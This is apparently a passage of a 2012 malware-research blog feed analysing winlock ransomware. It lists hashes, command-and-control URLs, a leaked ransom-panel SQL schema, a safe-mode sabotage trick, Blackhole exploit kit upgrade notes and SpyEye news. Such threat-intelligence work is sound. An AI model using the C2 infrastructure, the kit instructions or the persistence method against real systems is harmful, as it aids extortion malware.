/></a></div>And ther answer is... yes!<br />I continue to keep an eye on these winlocks, here are some interesting cases:<br /><br />MD5: <b style="color: red;">C7C6735C0A143E54CAAEB38FFF252E49</b><br />Sacem, winlock targeting French ppl.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-bm8D-pNMEeM/T6U_6_50LcI/AAAAAAAAF2k/C0X5EBS8Oe4/s1600/sacem.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://3.bp.blogspot.com/-bm8D-pNMEeM/T6U_6_50LcI/AAAAAAAAF2k/C0X5EBS8Oe4/s400/sacem.PNG" width="400" /></a></div><br />This winlock appeared when i got more important things to do than tracking malwares so i've not investigated alot on this one... <br />This winlock was deserved via blackhole and the winlock stuff hosted on the same BH server.<br /><br />The following urls were found:<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">http://panuniv1.com/universal2/universalbezahlung/frankreich/<br />http://panuniv1.com/universal2/universalbezahlung/england/<br />http://panuniv1.com/universal2/universalbezahlung/deutschland/<br />http://panuniv1.com/universal2/universalbezahlung/holland/<br />http://panuniv1.com/universal2/universalbezahlung/schweiz/<br />http://panuniv1.com/4/<br />http://panuniv1.com/connect/gate.php<br />http://panuniv1.com/universal2/redirector/redirector.php<br />http://panuniv1.com/universal2/universalpanel/gate.php?hwid=2140809940&amp;pc=XYLITOL-F12F085&amp;localip=192.168.142.128&amp;winver=Windows%20XP%20Professional%20x32<br />http://panuniv1.com/server-status/<br />http://panuniv1.com/phpmyadmin/<br />http://panuniv1.com/config/<br />http://panuniv1.com/3467/<br />http://panuniv1.com/bhadmin.php</div><br />C&amp;C fail?:<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">http://panuniv1.com/universal2/universalbezahlung/frankreich/edit.php<br />-&gt; Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'mfeeling_gema'@'localhost' (using password: YES) in /var/www/html/universal2/universalbezahlung/frankreich/inc/connect.php on line 2<br />could not connectAccess denied for user 'mfeeling_gema'@'localhost' (using password: YES)<br /><br />http://panuniv1.com/universal2/universalbezahlung/frankreich/insert.php<br />-&gt; Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: NO) in /var/www/html/universal2/universalbezahlung/frankreich/insert.php on line 3<br />Access denied for user 'root'@'localhost' (using password: NO)</div><br />---<br /><br />MD5: <b style="color: red;">F683C185A9EDE59394E163E7FB4C247D</b><br />Police nationale, winlock targeting french ppl (the background image change in function of your location)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-dnIrHezhndc/T5GZ0ZqqvEI/AAAAAAAAFt0/6XX1MeOb304/s1600/police.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-dnIrHezhndc/T5GZ0ZqqvEI/AAAAAAAAFt0/6XX1MeOb304/s400/police.png" width="400" /></a></div><br />Control panel (still in brute force)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-v9yJS7dLWTo/T5GbgcfJYWI/AAAAAAAAFuE/6xuVCf_KA7A/s1600/login.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-v9yJS7dLWTo/T5GbgcfJYWI/AAAAAAAAFuE/6xuVCf_KA7A/s400/login.PNG" width="400" /></a></div><br />Install:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-TEaYpgZY1Rc/T5pHc_MVE0I/AAAAAAAAFwI/x4N1e18tdVw/s1600/install.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-TEaYpgZY1Rc/T5pHc_MVE0I/AAAAAAAAFwI/x4N1e18tdVw/s400/install.PNG" width="400" /></a></div><br />The following urls were found:<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">http://109.236.88.220/Lc6zs7cJ7U/index.php<br />http://109.236.88.220/Lc6zs7cJ7U/getunlock.php<br />http://109.236.88.220/Lc6zs7cJ7U/unlock.php<br />http://109.236.88.220/Lc6zs7cJ7U/install.php <br />http://109.236.88.220/Lc6zs7cJ7U/picture.php?pin=0123456789123456<br />http://109.236.88.220/Lc6zs7cJ7U/css/bootstrap-responsive.css<br />http://109.236.88.220/Lc6zs7cJ7U/css/bootstrap-responsive.min.css<br />http://109.236.88.220/Lc6zs7cJ7U/css/bootstrap.css<br />http://109.236.88.220/Lc6zs7cJ7U/css/bootstrap.min.css<br />http://109.236.88.220/Lc6zs7cJ7U/css/border-radius.css<br />http://109.236.88.220/Lc6zs7cJ7U/css/jscal2.css<br />http://109.236.88.220/Lc6zs7cJ7U/css/reduce-spacing.css<br />http://109.236.88.220/Lc6zs7cJ7U/css/shadow-b.png<br />http://109.236.88.220/Lc6zs7cJ7U/css/style.css<br />http://109.236.88.220/Lc6zs7cJ7U/css/img/cool-bg-hard-inv.png<br />http://109.236.88.220/Lc6zs7cJ7U/css/img/cool-bg-hard.png<br />http://109.236.88.220/Lc6zs7cJ7U/css/img/cool-bg-inv.png&nbsp;&nbsp;&nbsp; <br />http://109.236.88.220/Lc6zs7cJ7U/css/img/cool-bg.png<br />http://109.236.88.220/Lc6zs7cJ7U/css/img/drop-down.gif<br />http://109.236.88.220/Lc6zs7cJ7U/css/img/drop-up.gif<br />http://109.236.88.220/Lc6zs7cJ7U/css/img/nav-left-x2.gif<br />http://109.236.88.220/Lc6zs7cJ7U/css/img/nav-left.gif<br />http://109.236.88.220/Lc6zs7cJ7U/css/img/nav-right-x2.gif&nbsp;&nbsp;&nbsp; <br />http://109.236.88.220/Lc6zs7cJ7U/css/img/nav-right.gif<br />http://109.236.88.220/Lc6zs7cJ7U/css/img/time-down.png<br />http://109.236.88.220/Lc6zs7cJ7U/css/img/time-up.png<br />http://109.236.88.220/Lc6zs7cJ7U/css/steel/brushed-steel.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/css/steel/brushed-steel.png<br />http://109.236.88.220/Lc6zs7cJ7U/css/steel/coolbg.png<br />http://109.236.88.220/Lc6zs7cJ7U/css/steel/steel.css<br />http://109.236.88.220/Lc6zs7cJ7U/css/steel/steel.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/upload/CA.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/upload/DE.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/upload/ES.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/upload/FR.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/upload/GR.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/upload/IT.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/upload/PT.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/upload/UK.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/upload/default.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/include/db.php<br />http://109.236.88.220/Lc6zs7cJ7U/include/config.php<br />http://109.236.88.220/Lc6zs7cJ7U/include/geoip.inc<br />http://109.236.88.220/Lc6zs7cJ7U/img/glyphicons-halflings.png<br />http://109.236.88.220/Lc6zs7cJ7U/img/glyphicons-halflings-white.png<br />http://109.236.88.220/Lc6zs7cJ7U/img/logo.png<br />http://109.236.88.220/Lc6zs7cJ7U/img/logo.jpg<br />http://109.236.88.220/Lc6zs7cJ7U/flags/FR.gif<br />http://109.236.88.220/Lc6zs7cJ7U/flags/Unknown.gif<br />http://109.236.88.220/Lc6zs7cJ7U/flags/AR.WOA.gif<br />http://109.236.88.220/Lc6zs7cJ7U/flags/SV.WOA.gif<br />http://109.236.88.220/Lc6zs7cJ7U/flags/RS.WOA.gif<br />http://109.236.88.220/Lc6zs7cJ7U/flags/PE.WOA.gif<br />http://109.236.88.220/Lc6zs7cJ7U/flags/NI.WOA.gif<br />http://109.236.88.220/Lc6zs7cJ7U/flags/LI.WOA.gif<br />http://109.236.88.220/Lc6zs7cJ7U/flags/HT.WOA.gif<br />http://109.236.88.220/Lc6zs7cJ7U/flags/CR.WOA.gif <br />http://109.236.88.220/Lc6zs7cJ7U/sql/db.sql<br />http://109.236.88.220/Lc6zs7cJ7U/tmp/get.php <br /><br />http://109.236.88.220/SE4rFBwKlt/<br />http://109.236.88.220/wEP3Krh5AE/<br />http://109.236.88.220/P0sryovk9M/<br />http://91.217.153.50/adm/ </div><br />logo.png<br /><br /><br /><center><img border="0" src="http://1.bp.blogspot.com/-qS4DJFiP9DM/T5GasizJ5AI/AAAAAAAAFt8/4Z03u3Ftmoo/s1600/logo.png" /></center><br /><br />db.sql:<br /><div class="sql" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"><span style="color: grey; font-style: italic;">-- phpMyAdmin SQL Dump</span><br /><span style="color: grey; font-style: italic;">-- version 3.3.3</span><br /><span style="color: grey; font-style: italic;">-- http://www.phpmyadmin.net</span><br /><span style="color: grey; font-style: italic;">--</span><br /><span style="color: grey; font-style: italic;">-- Host: localhost</span><br /><span style="color: grey; font-style: italic;">-- Generation Time: Mar 18, 2012 at 11:28 PM</span><br /><span style="color: grey; font-style: italic;">-- Server version: 5.1.54</span><br /><span style="color: grey; font-style: italic;">-- PHP Version: 5.3.7-ZS5.5.0</span><br /><br /><span style="color: #993333; font-weight: bold;">SET</span> SQL_MODE<span style="color: #66cc66;">=</span><span style="color: red;">"NO_AUTO_VALUE_ON_ZERO"</span>;<br /><br /><br /><span style="color: grey; font-style: italic;">/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */</span>;<br /><span style="color: grey; font-style: italic;">/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */</span>;<br /><span style="color: grey; font-style: italic;">/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */</span>;<br /><span style="color: grey; font-style: italic;">/*!40101 SET NAMES utf8 */</span>;<br /><br /><span style="color: grey; font-style: italic;">--</span><br /><span style="color: grey; font-style: italic;">-- Database: `cp`</span><br /><span style="color: grey; font-style: italic;">--</span><br /><br /><span style="color: grey; font-style: italic;">-- --------------------------------------------------------</span><br /><br /><span style="color: grey; font-style: italic;">--</span><br /><span style="color: grey; font-style: italic;">-- Table structure for table `billing`</span><br /><span style="color: grey; font-style: italic;">--</span><br /><br /><span style="color: #993333; font-weight: bold;">CREATE</span> <span style="color: #993333; font-weight: bold;">TABLE</span> <span style="color: #993333; font-weight: bold;">IF</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">EXISTS</span> <span style="color: red;">`billing`</span> <span style="color: #66cc66;">(</span><br />&nbsp; <span style="color: red;">`id`</span> int<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">255</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span> <span style="color: #993333; font-weight: bold;">AUTO_INCREMENT</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: red;">`ucash`</span> varchar<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">999</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: red;">`psc`</span> varchar<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">999</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: red;">`ip`</span> varchar<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">999</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: red;">`country`</span> varchar<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">999</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: red;">`date`</span> varchar<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">999</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: red;">`go`</span> varchar<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">99</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: #993333; font-weight: bold;">PRIMARY</span> <span style="color: #993333; font-weight: bold;">KEY</span> <span style="color: #66cc66;">(</span><span style="color: red;">`id`</span><span style="color: #66cc66;">)</span><br /><span style="color: #66cc66;">)</span> ENGINE<span style="color: #66cc66;">=</span>MyISAM &nbsp;<span style="color: #993333; font-weight: bold;">DEFAULT</span> CHARSET<span style="color: #66cc66;">=</span>latin1 <span style="color: #993333; font-weight: bold;">AUTO_INCREMENT</span><span style="color: #66cc66;">=</span><span style="color: #cc66cc;">45</span> ;<br /><br /><span style="color: grey; font-style: italic;">--</span><br /><span style="color: grey; font-style: italic;">-- Dumping data for table `billing`</span><br /><span style="color: grey; font-style: italic;">--</span><br /><br /><br /><span style="color: grey; font-style: italic;">-- --------------------------------------------------------</span><br /><br /><span style="color: grey; font-style: italic;">--</span><br /><span style="color: grey; font-style: italic;">-- Table structure for table `checklist`</span><br /><span style="color: grey; font-style: italic;">--</span><br /><br /><span style="color: #993333; font-weight: bold;">CREATE</span> <span style="color: #993333; font-weight: bold;">TABLE</span> <span style="color: #993333; font-weight: bold;">IF</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">EXISTS</span> <span style="color: red;">`checklist`</span> <span style="color: #66cc66;">(</span><br />&nbsp; <span style="color: red;">`id`</span> int<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">255</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span> <span style="color: #993333; font-weight: bold;">AUTO_INCREMENT</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: red;">`ip`</span> varchar<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">999</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: red;">`country`</span> varchar<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">999</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: red;">`date`</span> varchar<span style="color: #66cc66;">(</span><span style="color: #cc66cc;">999</span><span style="color: #66cc66;">)</span> <span style="color: #993333; font-weight: bold;">NOT</span> <span style="color: #993333; font-weight: bold;">NULL</span><span style="color: #66cc66;">,</span><br />&nbsp; <span style="color: #993333; font-weight: bold;">PRIMARY</span> <span style="color: #993333; font-weight: bold;">KEY</span> <span style="color: #66cc66;">(</span><span style="color: red;">`id`</span><span style="color: #66cc66;">)</span><br /><span style="color: #66cc66;">)</span> ENGINE<span style="color: #66cc66;">=</span>MyISAM &nbsp;<span style="color: #993333; font-weight: bold;">DEFAULT</span> CHARSET<span style="color: #66cc66;">=</span>latin1 <span style="color: #993333; font-weight: bold;">AUTO_INCREMENT</span><span style="color: #66cc66;">=</span><span style="color: #cc66cc;">314</span> ;<br /><br /><span style="color: grey; font-style: italic;">--</span><br /><span style="color: grey; font-style: italic;">-- Dumping data for table `checklist`</span><br /><span style="color: grey; font-style: italic;">--</span></div><br />Silence Winlocker advertising:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-82p6rXTRySw/T5G1gAq26gI/AAAAAAAAFuc/GD-aAOCPwrU/s1600/20-04-2012+21-13-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://4.bp.blogspot.com/-82p6rXTRySw/T5G1gAq26gI/AAAAAAAAFuc/GD-aAOCPwrU/s640/20-04-2012+21-13-22.png" width="403" /></a></div><br />And a second 'Silence winlocker' powered winlock (according to the control panel):<br /><br />MD5: <b style="color: red;">6D8DB0D28948A4D91A30E51C6901BBA0</b><br />Gendarmerie, winlock targeting French ppl.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-tqKe-OYU9gc/T48NvTRT5KI/AAAAAAAAFss/ydHbLw_zh0k/s1600/18-04-2012+20-52-04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-tqKe-OYU9gc/T48NvTRT5KI/AAAAAAAAFss/ydHbLw_zh0k/s400/18-04-2012+20-52-04.png" width="400" /></a></div><br />Stuff usual, remove safe boot registry keys responsible to store services etc... for lead to a BSoD if the user try to remove it in safe mode.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-1dZjtONg1GY/T48VBpv9hCI/AAAAAAAAFs8/T1sPefQYlc0/s1600/bsod.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-1dZjtONg1GY/T48VBpv9hCI/AAAAAAAAFs8/T1sPefQYlc0/s400/bsod.PNG" width="400" /></a></div><br />Check the lenghts of pins:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--0hM1exkg-s/T48SqBwhVHI/AAAAAAAAFs0/MpK2tdfF7bA/s1600/lenght_check.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/--0hM1exkg-s/T48SqBwhVHI/AAAAAAAAFs0/MpK2tdfF7bA/s400/lenght_check.PNG" width="273" /></a></div><br />Malware call home:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-3esZRFVQY90/T5GH4_RidTI/AAAAAAAAFtM/4f0n79H2mTQ/s1600/18-04-2012+20-45-59.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-3esZRFVQY90/T5GH4_RidTI/AAAAAAAAFtM/4f0n79H2mTQ/s400/18-04-2012+20-45-59.png" width="400" /></a></div><br />PSC/Ukash pins:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-zcIomf5wgsg/T5GK639MlFI/AAAAAAAAFtU/hCWO9ClMN-k/s1600/18-04-2012+20-43-49.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-zcIomf5wgsg/T5GK639MlFI/AAAAAAAAFtU/hCWO9ClMN-k/s400/18-04-2012+20-43-49.png" width="400" /></a></div><br />reports.txt<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/--XwYDyxVU_M/T5G1-bNondI/AAAAAAAAFuk/yJ2AbedD5pI/s1600/18-04-2012+20-44-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="http://4.bp.blogspot.com/--XwYDyxVU_M/T5G1-bNondI/AAAAAAAAFuk/yJ2AbedD5pI/s400/18-04-2012+20-44-11.png" width="400" /></a></div><br />Richi fake:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-9sK--FIs74w/T5G2NI_bh2I/AAAAAAAAFus/y7NgOZRf72s/s1600/18-04-2012+20-47-09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-9sK--FIs74w/T5G2NI_bh2I/AAAAAAAAFus/y7NgOZRf72s/s400/18-04-2012+20-47-09.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-MekylVMxdfA/T5G2Z2RM5ZI/AAAAAAAAFu0/9iYdSEeTG8k/s1600/18-04-2012+20-47-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-MekylVMxdfA/T5G2Z2RM5ZI/AAAAAAAAFu0/9iYdSEeTG8k/s400/18-04-2012+20-47-23.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-jYlzJ_wPiio/T5G3K-ygogI/AAAAAAAAFvE/AfF_mh58zZM/s1600/18-04-2012+20-47-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-jYlzJ_wPiio/T5G3K-ygogI/AAAAAAAAFvE/AfF_mh58zZM/s400/18-04-2012+20-47-44.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-8b-6j5tKXJ4/T5G2gPzWsZI/AAAAAAAAFu8/6tfiwXqowyE/s1600/18-04-2012+20-47-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-8b-6j5tKXJ4/T5G2gPzWsZI/AAAAAAAAFu8/6tfiwXqowyE/s400/18-04-2012+20-47-58.png" width="400" /></a></div><br />That all for the moment, i've no idea if the author of silence winlocker do also fake police design.<br />Edit: no :)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-vFd_wJP1PZw/T5pXyMqleEI/AAAAAAAAFwg/SqcpBg5CbcU/s1600/Silencee.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-vFd_wJP1PZw/T5pXyMqleEI/AAAAAAAAFwg/SqcpBg5CbcU/s640/Silencee.PNG" width="394" /></a></div><br />IRL, no one care but i've just bought a PS3 (: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-OEXj7bemrWw/T5GOfEy0ZhI/AAAAAAAAFtk/sR7sjAzjadk/s1600/ps3_xyl.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://4.bp.blogspot.com/-OEXj7bemrWw/T5GOfEy0ZhI/AAAAAAAAFtk/sR7sjAzjadk/s400/ps3_xyl.jpg" width="400" /></a></div><br />Also if you don't know already the news.. <a href="http://www.phrack.com/issues.html?issue=68&amp;id=1#article">Phrack issue #68</a> is out,&nbsp;<i> fuckyeah!</i><br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">Many people, including myself, do hacking as a hobby and choose<br />to participate in a different industry for our living income. If you choose<br />this path you will realize that as being part of this community will bring <br />you a lot of happiness.</div>Quoted from 0x07 Happy Hacking.<br /><br /><b style="color: red;">Edit 27 Apr 2k12</b>: <br />- More path added<br />- ICQ conversation added<br />+ Checkout this new post by <a href="http://www.symantec.com/connect/blogs/ransomware-and-silence-locker-control-panel">Symantec guys</a> and <a href="http://www.symantec.com/connect/blogs/ransomware-crimeware-kits">this</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-2063037032381152009?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/04/silence-winlocker.htmlnoreply@blogger.com (Steven K)5tag:blogger.com,1999:blog-5365964245877416061.post-3909185546760499873Sat, 07 Apr 2012 07:48:00 +00002012-04-07T09:48:29.671+02:00XyliboxNot dead yetLike i've says on <a href="https://twitter.com/#%21/Xylit0l/status/185641811895787520">twitter</a>, for those who don't follow me, i'm just away for 15days/1month.<br />Finished to move on new house and actually waiting my new isp for box, activation and shit's.<br /><br />I've checked my mail inbox, 327 e-mails recevied, including malware samples, thanks you guys !<br />I will probably not answer to everyone for threats info but i will do my best.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-q94btRl1u3k/T3_soQ3BoHI/AAAAAAAAFrc/LhtPQ0l6Ji8/s1600/IsThisRealLife.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="http://1.bp.blogspot.com/-q94btRl1u3k/T3_soQ3BoHI/AAAAAAAAFrc/LhtPQ0l6Ji8/s400/IsThisRealLife.jpg" width="400" /></a></div><br />Happy easter.<br />(\(\<br />(='.')<br />o(_")")<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-3909185546760499873?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/04/not-dead-yet.htmlnoreply@blogger.com (Steven K)1tag:blogger.com,1999:blog-5365964245877416061.post-4718439428801465360Tue, 27 Mar 2012 23:22:00 +00002012-03-28T01:28:17.344+02:00blackholeexploit kitBlackhole v1.2.3&nbsp;Blackhole 1.2.3 released.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-3Lp1dV80F-0/T3JK-glNIoI/AAAAAAAAFqI/mHnNHXiW5lc/s1600/28-03-2012+01-19-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="http://1.bp.blogspot.com/-3Lp1dV80F-0/T3JK-glNIoI/AAAAAAAAFqI/mHnNHXiW5lc/s400/28-03-2012+01-19-00.png" width="400" /></a></div><br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">обновление до версии 1.2.3<br />1)файлы из архива перезалить поверх старых<br />2)учитывайте имя main.php если у вас он называется както по другому<br />3) в config.php надо поменять значение 'ExploitsDir'-вместо 'content' поставить 'data'<br />4) поставить на все залитые файлы и папки права на запись<br />5) сбрбосить всю стату<br />6) Вместо сплойта Java Pack теперь Java Array<br />7) в config.php поменять версию на 1.2.3</div><br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">update to version 1.2.3<br />1) update files from archive<br />2) if you main.php have other name-rename it<br />3) in config.php change value of 'ExploitsDir' to 'data'(old value was 'content')<br />4) set write permission to all updated files<br />5) reset all statistics<br />6) Java Pack exploit now replaced by Java Array<br />7) in config.php change version to 1.2.3</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-zcXaLrSffhA/T3JLT8k6zBI/AAAAAAAAFqY/u-M3Uhwo7lU/s1600/28-03-2012+01-19-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="http://4.bp.blogspot.com/-zcXaLrSffhA/T3JLT8k6zBI/AAAAAAAAFqY/u-M3Uhwo7lU/s400/28-03-2012+01-19-55.png" width="400" /></a></div><br />HS: Sorry for my inactivity these days, busy in real life with job and moving to new house.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-4718439428801465360?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/blackhole-v123.htmlnoreply@blogger.com (Steven K)8tag:blogger.com,1999:blog-5365964245877416061.post-504635188303405249Tue, 27 Mar 2012 23:02:00 +00002012-03-28T09:46:54.718+02:00GribodemonSpyEyeBehind SpyEye... GribodemonNot a surprise, Gribodemon have not delivered (and will never deliver?) a new SpyEye 1.3.50 update.<br />Customers started to become rapidly annoyed of seeing no progress and bored of gribodemon excuses for the update delay. <br />In parallel of the 1.3.x update, Gribodemon started to code the version 2 of SpyEye (bootkit, more injects, and some other items according to him)<br />The version 2 looked a totally new product, he even has been offline for several days as he's really working hard on v2<br />And when December 2011 come... no news... jabber bot shutdown, no more reply from the SpyEye team.<br />It's also due to this inactivity that most of SpyEye customers <a href="http://blog.damballa.com/?p=1494">moved</a> to others criminal toolkit like IceIX, Citadel...<br />Leaving Gribodemon alone with his problems...<br />More recently things come to light:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-PTQBOxkz4hM/T3FrBTW0IGI/AAAAAAAAFo4/FHnCJkQekxQ/s1600/lawsuit.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/-PTQBOxkz4hM/T3FrBTW0IGI/AAAAAAAAFo4/FHnCJkQekxQ/s400/lawsuit.PNG" width="322" /></a></div>So now it's just vx1 and gribo running loose and there are indictments and detention orders for both of their real identities (cannot say more for obvious reasons)<br /><br />The last time i've talked of SpyEye on my blog was about the <a href="http://xylibox.blogspot.fr/2011/10/spyeye-c-hack-them-all.html">Video grabber</a>, but there is also another kind of beta plugin released the same time as the video grabber: the data grabber<br /><br /><br /><br /><center><img border="0" src="http://1.bp.blogspot.com/-FdD03URm2_I/TrmkybajueI/AAAAAAAADRc/ThHyovNIgig/s1600/07-11-2011+18-44-10.png" /></center><br /><br />FRMCP:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-4nmj3niLJ40/Trmm-z8gcvI/AAAAAAAADRs/sDXSKFUrO6I/s1600/DataGrabber.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="http://4.bp.blogspot.com/-4nmj3niLJ40/Trmm-z8gcvI/AAAAAAAADRs/sDXSKFUrO6I/s400/DataGrabber.PNG" width="400" /></a></div><br />Data grabber:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-bpP7uZc2H_E/TrmpyMpfz3I/AAAAAAAADR0/eYp4wGcR6sc/s1600/DataGrabber2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 